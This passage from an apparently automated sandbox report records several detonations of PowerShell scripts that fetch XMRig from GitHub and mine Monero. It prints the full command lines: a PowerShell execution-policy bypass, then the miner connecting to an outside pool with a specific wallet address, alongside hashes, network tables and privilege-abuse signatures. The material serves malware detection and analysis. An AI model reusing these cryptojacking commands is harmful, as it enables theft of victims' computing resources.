powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (7).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 217.106.137.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.204.248.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 69.31.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| NL | 23.62.61.194:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 194.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.211.185.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | rx.unmineable.com | udp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
| US | 8.8.8.8:53 | 195.34.35.161.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 157.123.68.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.187.3.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 233.17.178.52.in-addr.arpa | udp |
Files
memory/3364-0-0x00007FFA85653000-0x00007FFA85655000-memory.dmp
memory/3364-1-0x00000194FA590000-0x00000194FA5B2000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_vqngwq4r.tlf.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/3364-11-0x00007FFA85650000-0x00007FFA86111000-memory.dmp
memory/3364-12-0x00007FFA85650000-0x00007FFA86111000-memory.dmp
memory/3364-14-0x00007FFA85650000-0x00007FFA86111000-memory.dmp
memory/3364-15-0x00000194FA720000-0x00000194FA732000-memory.dmp
memory/3364-16-0x00000194FA580000-0x00000194FA58A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/1952-47-0x000001F3F3390000-0x000001F3F33B0000-memory.dmp
memory/1952-48-0x000001F3F33E0000-0x000001F3F3400000-memory.dmp
memory/1952-49-0x00007FF644280000-0x00007FF644EB3000-memory.dmp
memory/1952-52-0x000001F3F4CC0000-0x000001F3F4CE0000-memory.dmp
memory/1952-51-0x000001F3F4CE0000-0x000001F3F4D00000-memory.dmp
memory/1952-50-0x00007FF644280000-0x00007FF644EB3000-memory.dmp
memory/3364-53-0x00007FFA85653000-0x00007FFA85655000-memory.dmp
memory/3364-54-0x00007FFA85650000-0x00007FFA86111000-memory.dmp
memory/1952-55-0x00007FF644280000-0x00007FF644EB3000-memory.dmp
memory/3364-56-0x00007FFA85650000-0x00007FFA86111000-memory.dmp
memory/1952-57-0x00007FF644280000-0x00007FF644EB3000-memory.dmp
memory/1952-58-0x000001F3F4CE0000-0x000001F3F4D00000-memory.dmp
memory/1952-59-0x000001F3F4CC0000-0x000001F3F4CE0000-memory.dmp
memory/1952-60-0x00007FF644280000-0x00007FF644EB3000-memory.dmp
memory/1952-61-0x00007FF644280000-0x00007FF644EB3000-memory.dmp
memory/1952-62-0x00007FF644280000-0x00007FF644EB3000-memory.dmp
memory/1952-63-0x00007FF644280000-0x00007FF644EB3000-memory.dmp
memory/1952-64-0x00007FF644280000-0x00007FF644EB3000-memory.dmp
memory/1952-65-0x00007FF644280000-0x00007FF644EB3000-memory.dmp
memory/1952-66-0x00007FF644280000-0x00007FF644EB3000-memory.dmp
memory/1952-67-0x00007FF644280000-0x00007FF644EB3000-memory.dmp
memory/1952-68-0x00007FF644280000-0x00007FF644EB3000-memory.dmp
memory/1952-69-0x00007FF644280000-0x00007FF644EB3000-memory.dmp
memory/1952-70-0x00007FF644280000-0x00007FF644EB3000-memory.dmp
memory/1952-71-0x00007FF644280000-0x00007FF644EB3000-memory.dmp
memory/1952-72-0x00007FF644280000-0x00007FF644EB3000-memory.dmp
memory/1952-73-0x00007FF644280000-0x00007FF644EB3000-memory.dmp
memory/1952-74-0x00007FF644280000-0x00007FF644EB3000-memory.dmp
memory/1952-75-0x00007FF644280000-0x00007FF644EB3000-memory.dmp
memory/1952-76-0x00007FF644280000-0x00007FF644EB3000-memory.dmp
memory/1952-77-0x00007FF644280000-0x00007FF644EB3000-memory.dmp
memory/1952-78-0x00007FF644280000-0x00007FF644EB3000-memory.dmp
memory/1952-79-0x00007FF644280000-0x00007FF644EB3000-memory.dmp
memory/1952-80-0x00007FF644280000-0x00007FF644EB3000-memory.dmp
memory/1952-81-0x00007FF644280000-0x00007FF644EB3000-memory.dmp
memory/1952-82-0x00007FF644280000-0x00007FF644EB3000-memory.dmp
memory/1952-83-0x00007FF644280000-0x00007FF644EB3000-memory.dmp
memory/1952-84-0x00007FF644280000-0x00007FF644EB3000-memory.dmp
memory/1952-85-0x00007FF644280000-0x00007FF644EB3000-memory.dmp
memory/1952-86-0x00007FF644280000-0x00007FF644EB3000-memory.dmp
memory/1952-87-0x00007FF644280000-0x00007FF644EB3000-memory.dmp
memory/1952-88-0x00007FF644280000-0x00007FF644EB3000-memory.dmp
memory/1952-89-0x00007FF644280000-0x00007FF644EB3000-memory.dmp
memory/1952-90-0x00007FF644280000-0x00007FF644EB3000-memory.dmp
memory/1952-91-0x00007FF644280000-0x00007FF644EB3000-memory.dmp
memory/1952-92-0x00007FF644280000-0x00007FF644EB3000-memory.dmp
memory/1952-93-0x00007FF644280000-0x00007FF644EB3000-memory.dmp
memory/1952-94-0x00007FF644280000-0x00007FF644EB3000-memory.dmp
memory/1952-95-0x00007FF644280000-0x00007FF644EB3000-memory.dmp
memory/1952-96-0x00007FF644280000-0x00007FF644EB3000-memory.dmp
memory/1952-97-0x00007FF644280000-0x00007FF644EB3000-memory.dmp
memory/1952-98-0x00007FF644280000-0x00007FF644EB3000-memory.dmp
memory/1952-99-0x00007FF644280000-0x00007FF644EB3000-memory.dmp
memory/1952-100-0x00007FF644280000-0x00007FF644EB3000-memory.dmp
memory/1952-101-0x00007FF644280000-0x00007FF644EB3000-memory.dmp
memory/1952-102-0x00007FF644280000-0x00007FF644EB3000-memory.dmp
memory/1952-103-0x00007FF644280000-0x00007FF644EB3000-memory.dmp
memory/1952-104-0x00007FF644280000-0x00007FF644EB3000-memory.dmp
memory/1952-105-0x00007FF644280000-0x00007FF644EB3000-memory.dmp
memory/1952-106-0x00007FF644280000-0x00007FF644EB3000-memory.dmp
memory/1952-107-0x00007FF644280000-0x00007FF644EB3000-memory.dmp
memory/1952-108-0x00007FF644280000-0x00007FF644EB3000-memory.dmp
memory/1952-109-0x00007FF644280000-0x00007FF644EB3000-memory.dmp
memory/1952-110-0x00007FF644280000-0x00007FF644EB3000-memory.dmp
memory/1952-111-0x00007FF644280000-0x00007FF644EB3000-memory.dmp
memory/1952-112-0x00007FF644280000-0x00007FF644EB3000-memory.dmp
memory/1952-113-0x00007FF644280000-0x00007FF644EB3000-memory.dmp
memory/1952-114-0x00007FF644280000-0x00007FF644EB3000-memory.dmp
memory/1952-115-0x00007FF644280000-0x00007FF644EB3000-memory.dmp
memory/1952-116-0x00007FF644280000-0x00007FF644EB3000-memory.dmp
memory/1952-117-0x00007FF644280000-0x00007FF644EB3000-memory.dmp
memory/1952-118-0x00007FF644280000-0x00007FF644EB3000-memory.dmp
Analysis: behavioral24
Detonation Overview
Submitted
2024-05-27 00:27
Reported
2024-05-27 01:42
Platform
win11-20240426-en
Max time kernel
1799s
Max time network
1764s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 5044 wrote to memory of 3444 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 5044 wrote to memory of 3444 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (7).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.111.133:443 | objects.githubusercontent.com | tcp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
| US | 52.111.229.43:443 | tcp |
Files
memory/5044-0-0x00007FFD0CE63000-0x00007FFD0CE65000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_r4iuxdw3.rbw.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/5044-9-0x000001AC90DA0000-0x000001AC90DC2000-memory.dmp
memory/5044-10-0x00007FFD0CE60000-0x00007FFD0D922000-memory.dmp
memory/5044-11-0x00007FFD0CE60000-0x00007FFD0D922000-memory.dmp
memory/5044-12-0x00007FFD0CE60000-0x00007FFD0D922000-memory.dmp
memory/5044-14-0x000001ACA9290000-0x000001ACA92A2000-memory.dmp
memory/5044-15-0x000001ACA9280000-0x000001ACA928A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/3444-46-0x000001DF2A520000-0x000001DF2A540000-memory.dmp
memory/3444-47-0x000001DF2BE20000-0x000001DF2BE40000-memory.dmp
memory/3444-48-0x00007FF747E70000-0x00007FF748AA3000-memory.dmp
memory/5044-49-0x00007FFD0CE63000-0x00007FFD0CE65000-memory.dmp
memory/3444-51-0x000001DF2BE40000-0x000001DF2BE60000-memory.dmp
memory/3444-52-0x000001DF2BE60000-0x000001DF2BE80000-memory.dmp
memory/5044-50-0x00007FFD0CE60000-0x00007FFD0D922000-memory.dmp
memory/3444-53-0x00007FF747E70000-0x00007FF748AA3000-memory.dmp
memory/3444-54-0x00007FF747E70000-0x00007FF748AA3000-memory.dmp
memory/3444-57-0x000001DF2BE60000-0x000001DF2BE80000-memory.dmp
memory/3444-56-0x000001DF2BE40000-0x000001DF2BE60000-memory.dmp
memory/3444-55-0x00007FF747E70000-0x00007FF748AA3000-memory.dmp
memory/3444-58-0x00007FF747E70000-0x00007FF748AA3000-memory.dmp
memory/3444-59-0x00007FF747E70000-0x00007FF748AA3000-memory.dmp
memory/3444-60-0x00007FF747E70000-0x00007FF748AA3000-memory.dmp
memory/3444-61-0x00007FF747E70000-0x00007FF748AA3000-memory.dmp
memory/3444-62-0x00007FF747E70000-0x00007FF748AA3000-memory.dmp
memory/3444-63-0x00007FF747E70000-0x00007FF748AA3000-memory.dmp
memory/3444-64-0x00007FF747E70000-0x00007FF748AA3000-memory.dmp
memory/3444-65-0x00007FF747E70000-0x00007FF748AA3000-memory.dmp
memory/3444-66-0x00007FF747E70000-0x00007FF748AA3000-memory.dmp
memory/3444-67-0x00007FF747E70000-0x00007FF748AA3000-memory.dmp
memory/3444-68-0x00007FF747E70000-0x00007FF748AA3000-memory.dmp
memory/3444-69-0x00007FF747E70000-0x00007FF748AA3000-memory.dmp
memory/3444-70-0x00007FF747E70000-0x00007FF748AA3000-memory.dmp
memory/3444-71-0x00007FF747E70000-0x00007FF748AA3000-memory.dmp
memory/3444-72-0x00007FF747E70000-0x00007FF748AA3000-memory.dmp
memory/3444-73-0x00007FF747E70000-0x00007FF748AA3000-memory.dmp
memory/3444-74-0x00007FF747E70000-0x00007FF748AA3000-memory.dmp
memory/3444-75-0x00007FF747E70000-0x00007FF748AA3000-memory.dmp
memory/3444-76-0x00007FF747E70000-0x00007FF748AA3000-memory.dmp
memory/3444-77-0x00007FF747E70000-0x00007FF748AA3000-memory.dmp
memory/3444-78-0x00007FF747E70000-0x00007FF748AA3000-memory.dmp
memory/3444-79-0x00007FF747E70000-0x00007FF748AA3000-memory.dmp
memory/3444-80-0x00007FF747E70000-0x00007FF748AA3000-memory.dmp
memory/3444-81-0x00007FF747E70000-0x00007FF748AA3000-memory.dmp
memory/3444-82-0x00007FF747E70000-0x00007FF748AA3000-memory.dmp
memory/3444-83-0x00007FF747E70000-0x00007FF748AA3000-memory.dmp
memory/3444-84-0x00007FF747E70000-0x00007FF748AA3000-memory.dmp
memory/3444-85-0x00007FF747E70000-0x00007FF748AA3000-memory.dmp
memory/3444-86-0x00007FF747E70000-0x00007FF748AA3000-memory.dmp
memory/3444-87-0x00007FF747E70000-0x00007FF748AA3000-memory.dmp
memory/3444-88-0x00007FF747E70000-0x00007FF748AA3000-memory.dmp
memory/3444-89-0x00007FF747E70000-0x00007FF748AA3000-memory.dmp
memory/3444-90-0x00007FF747E70000-0x00007FF748AA3000-memory.dmp
memory/3444-91-0x00007FF747E70000-0x00007FF748AA3000-memory.dmp
memory/3444-92-0x00007FF747E70000-0x00007FF748AA3000-memory.dmp
memory/3444-93-0x00007FF747E70000-0x00007FF748AA3000-memory.dmp
memory/3444-94-0x00007FF747E70000-0x00007FF748AA3000-memory.dmp
memory/3444-95-0x00007FF747E70000-0x00007FF748AA3000-memory.dmp
memory/3444-96-0x00007FF747E70000-0x00007FF748AA3000-memory.dmp
memory/3444-97-0x00007FF747E70000-0x00007FF748AA3000-memory.dmp
memory/3444-98-0x00007FF747E70000-0x00007FF748AA3000-memory.dmp
memory/3444-99-0x00007FF747E70000-0x00007FF748AA3000-memory.dmp
memory/3444-100-0x00007FF747E70000-0x00007FF748AA3000-memory.dmp
memory/3444-101-0x00007FF747E70000-0x00007FF748AA3000-memory.dmp
memory/3444-102-0x00007FF747E70000-0x00007FF748AA3000-memory.dmp
memory/3444-103-0x00007FF747E70000-0x00007FF748AA3000-memory.dmp
memory/3444-104-0x00007FF747E70000-0x00007FF748AA3000-memory.dmp
memory/3444-105-0x00007FF747E70000-0x00007FF748AA3000-memory.dmp
memory/3444-106-0x00007FF747E70000-0x00007FF748AA3000-memory.dmp
memory/3444-107-0x00007FF747E70000-0x00007FF748AA3000-memory.dmp
memory/3444-108-0x00007FF747E70000-0x00007FF748AA3000-memory.dmp
memory/3444-109-0x00007FF747E70000-0x00007FF748AA3000-memory.dmp
memory/3444-110-0x00007FF747E70000-0x00007FF748AA3000-memory.dmp
memory/3444-111-0x00007FF747E70000-0x00007FF748AA3000-memory.dmp
memory/3444-112-0x00007FF747E70000-0x00007FF748AA3000-memory.dmp
memory/3444-113-0x00007FF747E70000-0x00007FF748AA3000-memory.dmp
memory/3444-114-0x00007FF747E70000-0x00007FF748AA3000-memory.dmp
memory/3444-115-0x00007FF747E70000-0x00007FF748AA3000-memory.dmp
memory/3444-116-0x00007FF747E70000-0x00007FF748AA3000-memory.dmp
Analysis: behavioral28
Detonation Overview
Submitted
2024-05-27 00:27
Reported
2024-05-27 01:43
Platform
win11-20240426-en
Max time kernel
1798s
Max time network
1788s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 3352 wrote to memory of 3752 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 3352 wrote to memory of 3752 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (8).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
Files
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_jy4nc3i3.mx3.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/3352-0-0x00007FFD97883000-0x00007FFD97885000-memory.dmp
memory/3352-9-0x00007FFD97880000-0x00007FFD98342000-memory.dmp
memory/3352-10-0x00007FFD97880000-0x00007FFD98342000-memory.dmp
memory/3352-11-0x000002166A300000-0x000002166A322000-memory.dmp
memory/3352-12-0x00007FFD97880000-0x00007FFD98342000-memory.dmp
memory/3352-15-0x000002166A380000-0x000002166A38A000-memory.dmp
memory/3352-14-0x000002166A390000-0x000002166A3A2000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/3752-46-0x000001DB4F960000-0x000001DB4F980000-memory.dmp
memory/3752-47-0x000001DB4F9B0000-0x000001DB4F9D0000-memory.dmp
memory/3752-48-0x00007FF77B470000-0x00007FF77C0A3000-memory.dmp
memory/3352-52-0x00007FFD97880000-0x00007FFD98342000-memory.dmp
memory/3752-49-0x00007FF77B470000-0x00007FF77C0A3000-memory.dmp
memory/3352-51-0x00007FFD97883000-0x00007FFD97885000-memory.dmp
memory/3752-50-0x000001DB4F9D0000-0x000001DB4F9F0000-memory.dmp
memory/3752-53-0x000001DB512B0000-0x000001DB512D0000-memory.dmp
memory/3752-54-0x00007FF77B470000-0x00007FF77C0A3000-memory.dmp
memory/3752-56-0x000001DB4F9D0000-0x000001DB4F9F0000-memory.dmp
memory/3752-55-0x00007FF77B470000-0x00007FF77C0A3000-memory.dmp
memory/3752-57-0x000001DB512B0000-0x000001DB512D0000-memory.dmp
memory/3752-58-0x00007FF77B470000-0x00007FF77C0A3000-memory.dmp
memory/3752-59-0x00007FF77B470000-0x00007FF77C0A3000-memory.dmp
